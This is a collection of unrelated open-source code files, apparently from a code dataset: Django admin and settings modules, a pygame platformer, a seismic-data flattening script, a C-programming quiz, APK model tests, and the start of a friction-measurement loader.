azmtva01/Money-Control | 4,552,665,352,227 | db03b193cddc969c8f01a7a77202f62b2cccc209 | 30250bc838b78e8fb4f20fc66f1ac9e0894a835a | /moneyproj/moneyapp/admin.py | a64d56137cbe4bb05aa13adde932042e72b789a6 | []
| no_license | https://github.com/azmtva01/Money-Control | 67eaa93e4429302752c1c2f442b2d4555f790883 | 1867d3db4ea0c6a8a1da9fe5549e52a631f88362 | refs/heads/master | 2022-07-29T19:03:53.995792 | 2020-05-22T10:47:01 | 2020-05-22T10:47:01 | 266,083,774 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from django.utils.safestring import mark_safe
from .models import Category, Person, Budget
class BudgetInline(admin.TabularInline):
model = Budget
extra = 1
class PersonAdmin(admin.ModelAdmin):
list_display = ('name', 'age', 'user_profile', 'currency', 'auth_code', 'total_account', 'image', 'id')
readonly_fields = ('get_image', 'id')
inlines = [BudgetInline]
save_on_top = True
search_fields = ('name',)
def get_image(self, obj):
return mark_safe(f'<img src={obj.image.url} width="50", height="60" ')
get_image.short_description = 'Image'
class BudgetAdmin(admin.ModelAdmin):
list_display = ('person', 'income_value', 'expense_value', 'category', 'added_date', 'id')
list_filter = ('category', 'added_date', )
search_fields = ('person', 'income_value', )
class CategoryAdmin(admin.ModelAdmin):
list_display = ('title', 'budget_choice', 'id')
list_filter = ('title',)
search_fields = ('title',)
admin.site.register(Category, CategoryAdmin)
admin.site.register(Person, PersonAdmin)
admin.site.register(Budget, BudgetAdmin)
admin.site.site_title = "Money Control"
admin.site.site_header = "Money Control"
| UTF-8 | Python | false | false | 1,216 | py | 11 | admin.py | 11 | 0.677632 | 0.67352 | 0 | 39 | 30.179487 | 107 |
leantony/learing-python | 3,066,606,650,565 | 6dc976f4598be80b6bfa355dedb754d8039be160 | fd602843d5a5ba03c186fb578f0a775ee175a079 | /files.py | 037a71fa17feda508aed9c8b678bd98c200ddc2b | []
| no_license | https://github.com/leantony/learing-python | 6ef6cb1944587e3036cca0af0bf5dde4cd287e3a | 846e263da64cc561d84ff20462874896cefc43e3 | refs/heads/master | 2021-08-18T19:47:38.404290 | 2017-11-23T17:44:42 | 2017-11-23T17:44:42 | 105,186,698 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | data = open('alice.txt', 'r')
content = data.read()
i = 0
s = []
for line in content.split():
i +=1
s.append(line)
print(len(s))
| UTF-8 | Python | false | false | 133 | py | 12 | files.py | 10 | 0.586466 | 0.571429 | 0 | 10 | 12.3 | 29 |
drdavidknott/betterstart | 16,630,113,384,106 | e3f6074589a9a6f9388bb407a904877fe883eeb5 | bf2aa4eab14a6a5347fe4af65cc4a37f512a465d | /betterstart/settings.py | 73aa5d9f84c613aea47477541215b345859de51f | []
| no_license | https://github.com/drdavidknott/betterstart | 0cda889f5cd6bb779f6d1fa75cb4f2ef08eb626c | 59e2f8282b34b7c75e1e19e1cfa276b787118adf | refs/heads/master | 2023-05-04T07:32:24.796488 | 2023-04-16T15:26:30 | 2023-04-16T15:26:30 | 173,626,906 | 0 | 0 | null | false | 2023-02-18T07:27:55 | 2019-03-03T20:37:01 | 2022-01-02T10:33:21 | 2023-02-18T07:27:18 | 6,245 | 0 | 0 | 30 | Python | false | false | """
Django settings for betterstart project.
Generated by 'django-admin startproject' using Django 2.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# Get the secret key from the environment variable; default is only here to support local development
SECRET_KEY = os.getenv('BETTERSTART_SK','=lnd59!%m+51yz(h&-ud07cs8a(1kzw&_utqjoxi+50+=45f44')
# Get the debug flag from the relevant environment variable
if os.getenv('BETTERSTART_DEBUG',None) == 'True':
DEBUG = True
# otherwise turn off debug
else:
DEBUG = False
ALLOWED_HOSTS = [
'betterstart-236907.appspot.com',
'127.0.0.1',
'oysta.org',
'www.oysta.org',
'betterstart.oysta.org',
'betterstart-uat.appspot.com',
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'people.apps.PeopleConfig',
'crispy_forms',
'django_otp',
'django_otp.plugins.otp_totp',
'django_otp.plugins.otp_hotp',
'django_otp.plugins.otp_static',
'zxcvbn_password',
'jsignature',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django_otp.middleware.OTPMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'betterstart.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'betterstart.wsgi.application'
CRISPY_TEMPLATE_PACK = 'bootstrap3'
OTP_TOTP_ISSUER = os.getenv('BETTERSTART_OTP_ISSUER','Betterstart OTP Default')
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
if os.getenv('BETTERSTART_DB', None) == 'local':
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
elif os.getenv('GAE_APPLICATION', None):
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'HOST': os.getenv('BETTERSTART_DB_HOST', None),
'USER': os.getenv('BETTERSTART_DB_USER', None),
'PASSWORD': os.getenv('BETTERSTART_PW', None),
'NAME': os.getenv('BETTERSTART_DB_NAME', None),
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'HOST': '127.0.0.1',
'PORT': os.getenv('BETTERSTART_DB_PORT', None),
'NAME': os.getenv('BETTERSTART_DB_NAME', None),
'USER': os.getenv('BETTERSTART_DB_USER', None),
'PASSWORD': os.getenv('BETTERSTART_PW', None),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
{
'NAME': 'zxcvbn_password.ZXCVBNValidator',
'OPTIONS': {
'min_score': 3,
'user_attributes': ('username', 'email', 'first_name', 'last_name')
}
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/London'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = 'static'
MEDIA_ROOT = 'media'
MEDIA_URL = '/media/'
# Authentication
LOGIN_URL = '/people/login'
# Sendgrid email settings
SENDGRID_API_KEY = os.getenv('SENDGRID_API_KEY')
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = 'apikey'
EMAIL_HOST_PASSWORD = SENDGRID_API_KEY
EMAIL_PORT = 587
EMAIL_USE_TLS = True
| UTF-8 | Python | false | false | 4,728 | py | 342 | settings.py | 193 | 0.71214 | 0.699027 | 0 | 186 | 24.419355 | 101 |
zfbi/lss | 15,187,004,362,472 | 42fc6b8134b5bfca5c4356cdb0e6b6f24926abc8 | 06a775cbc3fdfd2069eda66c5ed0e7b04633b470 | /src/lss/flat/flatr3.py | 76c5e10a6dc065b171b00afcba9bf9c0d5444b85 | []
| no_license | https://github.com/zfbi/lss | 6937fe53a8c34e1d1b819ee7e9ae20e08d6d634d | d09aac9fe6dc7f2ed88f66cb4803676ade67a1ff | refs/heads/master | 2021-05-30T03:02:14.632492 | 2014-11-24T21:42:44 | 2014-11-24T21:42:44 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Non-vertical flattening using transformed rotation equations
'''
from imports import *
pngDir = None
#pngDir = '/Users/sluo/Desktop/'
seisDir = '/data/scratch/'
s1,s2,s3 = Sampling(201),Sampling(201),Sampling(201)
n1,n2,n3 = s1.count,s2.count,s3.count
k1,k2,k3 = 190,190,190; azimuth=240; elevation=20 # for 3D views
timer = Stopwatch()
#############################################################################
def main(args):
show()
#makeFake3d()
#goFlatten()
def show():
f = read('f'); display(f,name='f')
g = read('g'); display(g,name='g')
def goFlatten():
slopes = False
shifts = False
f = read('f')
if slopes:
u1,u2,u3,ep = like(f),like(f),like(f),like(f)
timer.restart(); print 'slopes...'
LocalOrientFilter(1.0,1.0).applyForNormalPlanar(f,u1,u2,u3,ep)
timer.stop(); print 'slopes in %.2fs'%timer.time()
fill(u1[n3/2][n2/2][n1/2],u1)
fill(u2[n3/2][n2/2][n1/2],u2)
fill(u3[n3/2][n2/2][n1/2],u3)
fill(1.0,ep)
#display(u1,cmap=jet,name='u1')
#display(u2,cmap=jet,name='u2')
#display(u3,cmap=jet,name='u3')
#display(ep,cmap=jet,name='ep')
write('u1',u1)
write('u2',u2)
write('u3',u3)
write('ep',ep)
if shifts:
u1,u2,u3,ep = read('u1'),read('u2'),read('u3'),read('ep')
timer.restart(); print 'shifts...'
r = FlattenerRT(6.0,6.0).findShifts([u1,u2,u3,pow(ep,8.0)])
timer.stop(); print 'shifts in %.2fs'%timer.time()
r1,r2,r3 = r[0],r[1],r[2]
#display(r1,cmap=jet,name='r1')
#display(r2,cmap=jet,name='r2')
#display(r3,cmap=jet,name='r3')
g = FlattenerUtil.applyShiftsR(f,r)
write('g',g)
write('r1',r1)
write('r2',r2)
write('r3',r3)
g,r1,r2,r3 = read('g'),read('r1'),read('r2'),read('r3')
display(f,name='f')
display(g,name='g')
display(r1,cmap=jet,name='r1')
display(r2,cmap=jet,name='r2')
display(r3,cmap=jet,name='r3')
def like(x):
return zerofloat(len(x[0][0]),len(x[0]),len(x))
def makeFake3d():
n1p = int(1.8*n1)
g = FakeData.seismic3d2010A(n1p,n2,n3,0.0,0.0,0.0,1.0,0.0)
s = like(g)
for i3 in range(n3):
for i2 in range(n2):
r = abs(i3+i2)*0.3
s[i3][i2] = fillfloat(r,n1p)
zero = zerofloat(n1p,n2,n3)
t = FlattenerUtil.applyShiftsS(g,[s,zero,zero])
f = copy(n1,n2,n3,int(0.5*(n1p-n1)),0,0,t)
display(f)
write('f',f)
#############################################################################
gray = ColorMap.GRAY
jet = ColorMap.JET
rwb = ColorMap.RED_WHITE_BLUE
def plot(x,cmap=gray,cmin=0.0,cmax=0.0,cbar=None,name=None):
pan = panel(cbar)
pix = pan.addPixels(x)
pix.setColorModel(cmap)
if cmin<cmax:
pix.setClips(cmin,cmax)
pix.setInterpolation(PixelsView.Interpolation.LINEAR)
frame(pan,name)
def panel(cbar=None):
p = PlotPanel(PlotPanel.Orientation.X1DOWN_X2RIGHT)
cb = p.addColorBar()
if cbar:
cb.setLabel(cbar)
return p
def frame(panel,name=None):
frame = PlotFrame(panel)
frame.setBackground(Color(204,204,204,255))
#frame.setFontSizeForSlide(1.0,1.0)
frame.setSize(1200,600)
if name:
frame.setTitle(name)
frame.setVisible(True)
if name and pngDir:
frame.paintToPng(360,3.0,pngDir+name+'.png')
def read(name,image=None):
if not image:
image = zerofloat(n1,n2,n3)
fileName = seisDir+name+'.dat'
ais = ArrayInputStream(fileName)
ais.readFloats(image)
ais.close()
return image
def write(name,image,directory=seisDir):
fileName = directory+name+'.dat'
aos = ArrayOutputStream(fileName)
aos.writeFloats(image)
aos.close()
from org.python.util import PythonObjectInputStream
def readTensors(name):
fis = FileInputStream(seisDir+name+".dat")
ois = PythonObjectInputStream(fis)
tensors = ois.readObject()
fis.close()
return tensors
def writeTensors(name,tensors):
fos = FileOutputStream(seisDir+name+".dat")
oos = ObjectOutputStream(fos)
oos.writeObject(tensors)
fos.close()
#############################################################################
# graphics
def display(image,tensors=None,cmap=gray,cbar=None,
cmin=0,cmax=0,perc=100,name=None):
#return
world = World()
ipg = addImageToWorld(world,image,cmap,cmin,cmax,perc)
if tensors:
addTensorsToIpg(ipg,tensors)
frame = makeFrame(world,name)
if cbar:
colorbar = addColorBar(frame,cbar)
ipg.addColorMapListener(colorbar)
def display2(image1,image2,cmap1=gray,cmap2=gray,name=None):
world = World()
addImageToWorld(world,image1,cmap1)
addImageToWorld(world,image2,cmap2)
makeFrame(world,name)
def addImageToWorld(world,image,cmap=gray,cmin=0,cmax=0,perc=100):
ipg = ImagePanelGroup(s1,s2,s3,image)
ipg.setColorModel(cmap)
ipg.setSlices(k1,k2,k3)
if cmin<cmax:
ipg.setClips(cmin,cmax)
if perc<100:
ipg.setPercentiles(100-perc,perc)
world.addChild(ipg)
return ipg
def addTensorsToIpg(ipg,mt):
def add(ip,mt,esize=20):
#tp = TensorsPanel(s1,s2,s3,mt)
tp = TensorsPanel(mt)
tp.setEllipsoidSize(esize)
ip.getFrame().addChild(tp)
return tp
add(ipg.getImagePanel(Axis.X),mt)
add(ipg.getImagePanel(Axis.Y),mt)
add(ipg.getImagePanel(Axis.Z),mt)
def addColorBar(frame,label):
cbar = ColorBar(label)
cbar.setFont(cbar.getFont().deriveFont(24.0))
frame.add(cbar,BorderLayout.EAST)
#frame.viewCanvas.setBackground(frame.getBackground())
return cbar
def makeFrame(world,name=None):
n1,n2,n3 = s1.count,s2.count,s3.count
d1,d2,d3 = s1.delta,s2.delta,s3.delta
f1,f2,f3 = s1.first,s2.first,s3.first
l1,l2,l3 = s1.last,s2.last,s3.last
frame = SimpleFrame(world)
frame.setBackground(Color(204,204,204,255))
if name:
frame.setTitle(name)
view = frame.getOrbitView()
zscale = 0.75*max(n2*d2,n3*d3)/(n1*d1)
view.setAxesScale(1.0,1.0,zscale)
view.setScale(1.3)
view.setAzimuth(azimuth)
view.setElevation(elevation)
view.setWorldSphere(BoundingSphere(BoundingBox(f3,f2,f1,l3,l2,l1)))
frame.viewCanvas.setBackground(frame.getBackground())
#frame.setSize(1460,980)
frame.setSize(1020,750)
frame.setVisible(True)
return frame
def slice12(k3,f):
n1,n2,n3 = len(f[0][0]),len(f[0]),len(f)
s = zerofloat(n1,n2)
SimpleFloat3(f).get12(n1,n2,0,0,k3,s)
return s
def slice13(k2,f):
n1,n2,n3 = len(f[0][0]),len(f[0]),len(f)
s = zerofloat(n1,n3)
SimpleFloat3(f).get13(n1,n3,0,k2,0,s)
return s
def slice23(k1,f):
n1,n2,n3 = len(f[0][0]),len(f[0]),len(f)
s = zerofloat(n2,n3)
SimpleFloat3(f).get23(n2,n3,k1,0,0,s)
return s
def normal(x,y):
div(x,max(abs(x)),y)
#############################################################################
# Run the function main on the Swing thread
import sys,time
class RunMain(Runnable):
def run(self):
start = time.time()
main(sys.argv)
s = time.time()-start
h = int(s/3600); s -= h*3600
m = int(s/60); s -= m*60
print '%02d:%02d:%02d'%(h,m,s)
SwingUtilities.invokeLater(RunMain())
| UTF-8 | Python | false | false | 6,853 | py | 101 | flatr3.py | 100 | 0.636364 | 0.577557 | 0 | 249 | 26.522088 | 77 |
primeschool-it/Y13 | 8,203,387,551,570 | 7b93d2d6ba12d2670fa43c50099993b61f35c3c0 | b0a1b2c41556ca4e7368510b40e892e71c703e13 | /platfomer/platform.py | 2655a63a8ca1ca2a7bb9514e00155ed506d9eece | []
| no_license | https://github.com/primeschool-it/Y13 | d2c5bd145f8c05348c0aa870a4685dce7899a9c1 | 1684e82407deb6a2d47b591259230ee198074787 | refs/heads/main | 2023-03-29T04:59:13.061432 | 2021-03-31T15:56:28 | 2021-03-31T15:56:28 | 303,971,912 | 1 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pygame
pygame.init()
screen = pygame.display.set_mode((1000, 1000))
background = pygame.image.load('img/sky.jpg')
background = pygame.transform.scale(background, (1000,1000))
tile_size = 100
maryo_group = pygame.sprite.Group()
class Player(pygame.sprite.Sprite):
def __init__(self, x, y):
super(Player, self).__init__()
image = pygame.image.load('img/maryo.png')
left_image = pygame.transform.scale(image, (40,70))
right_image = pygame.transform.flip(image,True, False)
self.image = image
self.right_image = right_image
self.rect = image.get_rect()
self.rect.x = 100
self.rect.y = 830
self.direction = 'right'
self.execution_counter = 0
def update(self):
print(self.rect.x, self.rect.y)
screen.blit(self.image,(self.rect.x, self.rect.y))
keys = pygame.key.get_pressed()
if keys[pygame.K_LEFT]:
self.direction = 'left'
self.rect.x = self.rect.x - 10
if keys[pygame.K_RIGHT]:
self.direction = 'right'
self.rect.x = self.rect.x + 10
if self.direction == 'left':
screen.blit(self.right_image, (self.rect.x, self.rect.y))
else:
screen.blit(self.image, (self.rect.x, self.rect.y))
maryo = Player(100, 830)
maryo_group.add(maryo)
TILES_DATA = [
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
]
def draw():
row_counter = 0
for row in TILES_DATA:
col_counter = 0
for col in row:
if col == 1:
tile_img = pygame.image.load('img/tile.png')
tile_img = pygame.transform.scale(tile_img, (100, 100))
screen.blit(tile_img, (row_counter * tile_size, col_counter * tile_size))
col_counter += 1
row_counter += 1
run = True
while run:
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
screen.blit(background, (0, 0))
draw()
maryo_group.update()
pygame.display.update()
| UTF-8 | Python | false | false | 2,376 | py | 7 | platform.py | 7 | 0.530724 | 0.46633 | 0 | 83 | 27.626506 | 89 |
Mehedi-Bin-Hafiz/Status-check-of-student-by-Machine-Learning | 12,000,138,665,267 | a9d7f92ea351d68443487cdffa022c62eb4935c3 | ac3b4b27c026621283a7b087a795b86ff1e6902c | /ResearchGenerator/FinalStatusQuestion.py | 0af7fd895f0ba7582d2a1f4dabb947a780c9c888 | []
| no_license | https://github.com/Mehedi-Bin-Hafiz/Status-check-of-student-by-Machine-Learning | 7d29469152ef1ead3682bb050972b8baba24040c | 8949fe36ff9484417ab86115c432b3f87fe745e8 | refs/heads/master | 2023-08-18T01:57:10.771713 | 2021-09-26T01:53:38 | 2021-09-26T01:53:38 | 239,188,240 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # for i in range(1,11): #for create file
# f1=open('..\statusmean\FinalQuestions\{0}.txt'.format(i),'w')
# f1.close()
class FinalStatus():
def __init__(self, value):
self.ID = value
def Status(self):
problemlist=[]
TopicName=0
q1=0
q2=0
q3=0
q4=0
q5=0
q6=0
q7=0
q8=0
q9=0
q10=0
position=0
print("Topic:Input output.")
f1=open('..\statusmean\FinalQuestions\q1.txt','r',encoding="utf8")
print(f1.read())
f1.close()
ans1=input("Enter your ans:")
if(ans1=="\\"):
print('Right, You have got 1 marks')
q1=1
else:
TopicName=1
print('Wrong, Correct Answer is: \\ \n')
print("\nTopic: Simple calculation \n")
print("Question 2: ")
f2 = open('..\statusmean\FinalQuestions\q2.txt', 'r', encoding="utf8")
print(f2.read())
f2.close()
ans1 = input("Enter your ans:")
if (ans1 == '207'):
print('Right, You have got 2 marks')
q2 = 2
else:
print('Wrong, Correct Answer is: 207\n')
problemlist.append("simple calculation")
print("\nTopic: String: \n")
print('Question 3: ')
f3 = open('..\statusmean\FinalQuestions\q3.txt', 'r', encoding="utf8")
print(f3.read())
f3.close()
print('A. printf("%ld",V )')
print('B. printf("%c",V)')
print('C. printf("%s",V)')
print('D. printf("%f",V)')
ans1 = input("Enter your ans:")
ans1 = ans1.lower()
if (ans1 == 'c'):
print('Right, You have got 3 marks')
q3 = 3
else:
problemlist.append('String')
print('Wrong, Correct Answer is: Option C\n')
print("\nTopic: Input Output\n")
print("Question 4: ")
f4 = open('..\statusmean\FinalQuestions\q4.txt', 'r', encoding="utf8")
print(f4.read())
f4.close()
print('A. printf("\\n");')
print('B. echo "\\\\n";')
print("C. printf('\\n');")
print('D. printf("\\\\n");')
ans1 = input("Enter your ans:")
ans1 = ans1.lower()
if (ans1 == 'd'):
print('Right, You have got 4 marks')
q4 = 4
else:
TopicName=1
print('Wrong, Correct Answer is: Option D\n')
if (TopicName==1):
problemlist.append("Input output")
print( "\nTopic: Expression\n")
print("Question 5: ")
f5 = open('..\statusmean\FinalQuestions\q5.txt', 'r', encoding="utf8")
print(f5.read())
f5.close()
print("A. 2*xx+3*xy")
print("B. 2x^2+3*x*y")
print("C. 2*x*x+3*x*y")
print("D. 2*x*2+3*x*y")
ans1=input("Enter your ans:")
ans1=ans1.lower()
if(ans1=='c'):
print('Right, You have got 5 marks')
q5=5
else:
problemlist.append("Expression")
print('Wrong, Correct Answer is: Option C\n')
print("Question 6:\n")
f6 = open('..\statusmean\FinalQuestions\q6.txt', 'r', encoding="utf8")
print(f6.read())
f6.close()
ans1=input("Enter your ans:")
ans1=ans1.lower()
if(ans1=='0'):
print('Right, You have got 6 marks')
q6=6
else:
TopicName=2
print('Wrong Correct Answer is: 0\n')
print( "\nTopic: Conditional statement\n")
print('Question 7: ')
f7 = open('..\statusmean\FinalQuestions\q7.txt', 'r', encoding="utf8")
print(f7.read())
f7.close()
ans1=input("Enter your ans:")
ans1=ans1.lower()
if(ans1=='output is: '):
print('Right, You have got 7 marks')
q7=7
else:
print('Wrong Correct Answer is: output is: \n')
if (TopicName == 2):
problemlist.append("Conditional statement")
print( "\nTopic: Control Instructions\n")
print("Question 8: ")
f8 = open('..\statusmean\FinalQuestions\q8.txt', 'r', encoding="utf8")
print(f8.read())
f1.close()
ans1=input("Enter your ans:")
ans1=ans1.lower()
if(ans1=='output is: 21'):
print('Right, You have got 8 Marks')
q8=8
else:
problemlist.append("Arithmetic operation")
print('Wrong Correct Answer is: Output is: 21 \n')
print( "\nTopic: loop\n")
print("Question 9: " )
f9 = open('..\statusmean\FinalQuestions\q9.txt', 'r', encoding="utf8")
print(f9.read())
f9.close()
print('A. 1, 11\n 1, 12\n 2, 13')
print('B. 0, 11\n 1, 12\n 2, 13')
print("C. 0, 10\n 1, 11\n 2, 13")
print('D. 1, 11\n 1, 12\n 2, 13')
ans1=input("Enter your ans:")
ans1=ans1.lower()
if(ans1=='b'):
print('Right, You have got 9 marks')
q9=9
else:
problemlist.append("loop")
print('Wrong, Correct Answer is: Option B\n')
print("\nTopic: Problem solving\n")
print(" Question 10: ")
f10 = open('..\statusmean\FinalQuestions\q10.txt', 'r', encoding="utf8")
print(f10.read())
f10.close()
print("A. (25/100)*320")
print("B. (100/25)*320")
print("C. (100/325)*25")
print("D. 25/(100*320)")
ans1 = input("Enter your ans:")
ans1 = ans1.lower()
if (ans1 == 'a'):
print('Right, You have got 10 point')
q10 = 10
else:
problemlist.append("Problem solving")
print('Wrong, Correct Answer is: Option A\n')
status = FinalStatus(111)
status.Status() | UTF-8 | Python | false | false | 5,867 | py | 33 | FinalStatusQuestion.py | 17 | 0.486791 | 0.442475 | 0 | 196 | 28.938776 | 80 |
olenasmokvyna/mason-cli | 970,662,652,957 | 4b8dc4e0608af5f2d711ee362e4ef6566a85e91a | e38b7d9088344e4c7a2185a125ea03543f91fd82 | /tests/internal/models/test_apk.py | 6d46ca61959c0f4f65af86db98d6133717e10c32 | [
"Apache-2.0"
]
| permissive | https://github.com/olenasmokvyna/mason-cli | ca5fbe963bb49272dae7c8ac0fd2f5c374081a24 | ac9ac5041b12090b94958ec41d2b5a294c4b61e6 | refs/heads/master | 2023-07-19T11:26:45.748448 | 2021-09-09T17:31:01 | 2021-09-09T17:31:05 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import unittest
import click
from mock import MagicMock
from cli.internal.models.apk import Apk
from tests import __tests_root__
class ApkTest(unittest.TestCase):
def setUp(self):
config = MagicMock()
test_package_name = 'com.this.is.a.test'
test_package_version = '11'
test_package_version_code = 16
apkf = MagicMock()
apkf.package = MagicMock(return_value=test_package_name)
apkf.get_androidversion_name = MagicMock(return_value=test_package_version)
apkf.get_androidversion_code = MagicMock(return_value=test_package_version_code)
apkf.is_valid_APK = MagicMock(return_value=True)
apkf.get_min_sdk_version = MagicMock(return_value=23)
self.test_apk = Apk(config, MagicMock(), apkf)
def test_apk_is_valid(self):
self.assertIsNone(self.test_apk.validate())
def test_apk_content_type(self):
self.assertEqual(
self.test_apk.get_content_type(), 'application/vnd.android.package-archive')
def test_apk_type(self):
self.assertEqual(self.test_apk.get_type(), 'apk')
def test_apk_pretty_type(self):
self.assertEqual(self.test_apk.get_pretty_type(), 'App')
def test_apk_sub_type(self):
self.assertIsNone(self.test_apk.get_sub_type())
def test_apk_name(self):
self.assertEqual(self.test_apk.get_name(), self.test_apk.apk.get_package())
def test_apk_version(self):
self.assertEqual(self.test_apk.get_version(), self.test_apk.apk.get_androidversion_code())
def test_apk_meta_data(self):
meta_data = {
'apk': {
'versionName': self.test_apk.apk.get_androidversion_name(),
'versionCode': self.test_apk.apk.get_androidversion_code(),
'packageName': self.test_apk.apk.get_package()
},
}
self.assertEqual(self.test_apk.get_registry_meta_data(), meta_data)
def test_apk_v1_signed(self):
mock_config = MagicMock()
apk = Apk.parse(mock_config, os.path.join(__tests_root__, 'res', 'v1.apk'))
self.assertIsNotNone(apk)
def test_apk_v2_signed(self):
mock_config = MagicMock()
apk = Apk.parse(mock_config, os.path.join(__tests_root__, 'res', 'v2.apk'))
self.assertIsNotNone(apk)
def test_apk_v1_and_v2_signed(self):
mock_config = MagicMock()
apk = Apk.parse(mock_config, os.path.join(__tests_root__, 'res', 'v1and2.apk'))
self.assertIsNotNone(apk)
def test_apk_unsigned(self):
mock_config = MagicMock()
with self.assertRaises(click.Abort):
Apk.parse(mock_config, os.path.join(__tests_root__, 'res', 'unsigned.apk'))
def test_apk_debug_signed(self):
mock_config = MagicMock()
with self.assertRaises(click.Abort):
Apk.parse(mock_config, os.path.join(__tests_root__, 'res', 'debug.apk'))
| UTF-8 | Python | false | false | 2,933 | py | 61 | test_apk.py | 49 | 0.628367 | 0.623594 | 0 | 89 | 31.955056 | 98 |
mayziyuhuang/COF_Amgen | 481,036,346,619 | 82897e855d83865726387bbf6141e2a83c9e8445 | 74efc71fabcd9194c7f937dfd73e2bba13f2484f | /load_glass_glass.py | afe740104f38dcb4611a37b3a80a7e23bef1722c | []
| no_license | https://github.com/mayziyuhuang/COF_Amgen | 506570aa56c5d9cf928f28a972fbbe814ea9adcd | 5ee121ceb3e0de009c5f17de3da07e5ce627d3a4 | refs/heads/master | 2021-04-27T09:58:51.410200 | 2018-02-23T01:44:00 | 2018-02-23T01:44:00 | 122,527,501 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import scipy.special
import matplotlib
matplotlib.use
import matplotlib.pyplot as plt
plt.style.use('seaborn-talk')
import pandas as pd
import friction_functions as data
load_gram_1 = 657.8
load_gram_2 = 657.4
load_gram_3 = 204.2
load_gram_4 = 657.2
#1.1um PAC on glass vs glass, load = 657.8
glass1um1 = 'data/20171003_PAC1.1umglass_1_vs_glass_657.8g_load_1.xlsx'
glass1um1df = data.friction_data(glass1um1, load_gram_1)
glass1um2 = 'data/20171003_PAC1.1umglass_2_vs_glass_657.8g_load_1.xlsx'
glass1um2df = data.friction_data(glass1um2, load_gram_1)
glass1um3 = 'data/20171003_PAC1.1umglass_3_vs_glass_657.8g_load_1.xlsx'
glass1um3df = data.friction_data(glass1um3, load_gram_1)
glass1um4 = 'data/20171003_PAC1.1umglass_4_vs_glass_657.8g_load_1.xlsx'
glass1um4df = data.friction_data(glass1um4, load_gram_1)
glass1um5 = 'data/20171003_PAC1.1umglass_5_vs_glass_657.8g_load_1.xlsx'
glass1um5df = data.friction_data(glass1um5, load_gram_1)
#3.3um PAC on glass vs glass, load = 657.8
glass3um1 = 'data/20171003_PAC3.3umglass_1_vs_glass_657.8g_load_1.xlsx'
glass3um1df = data.friction_data(glass3um1, load_gram_1)
glass3um2 = 'data/20171003_PAC3.3umglass_2_vs_glass_657.8g_load_1.xlsx'
glass3um2df = data.friction_data(glass3um2, load_gram_1)
glass3um3 = 'data/20171003_PAC3.3umglass_3_vs_glass_657.8g_load_1.xlsx'
glass3um3df = data.friction_data(glass3um3, load_gram_1)
glass3um4 = 'data/20171003_PAC3.3umglass_4_vs_glass_657.8g_load_1.xlsx'
glass3um4df = data.friction_data(glass3um4, load_gram_1)
glass3um5 = 'data/20171003_PAC3.3umglass_5_vs_glass_657.8g_load_1.xlsx'
glass3um5df = data.friction_data(glass3um5, load_gram_1)
#0.1 um PAC on glass vs glass, load = 657.4
glass0_1um1 = 'data/20171006_PAC0.1umglass_1_vs_glass_657.4g_load_1.xlsx'
# ---------------------------------------------------------------------------
# Friction traces for the glass-vs-glass series. Each pair of lines registers
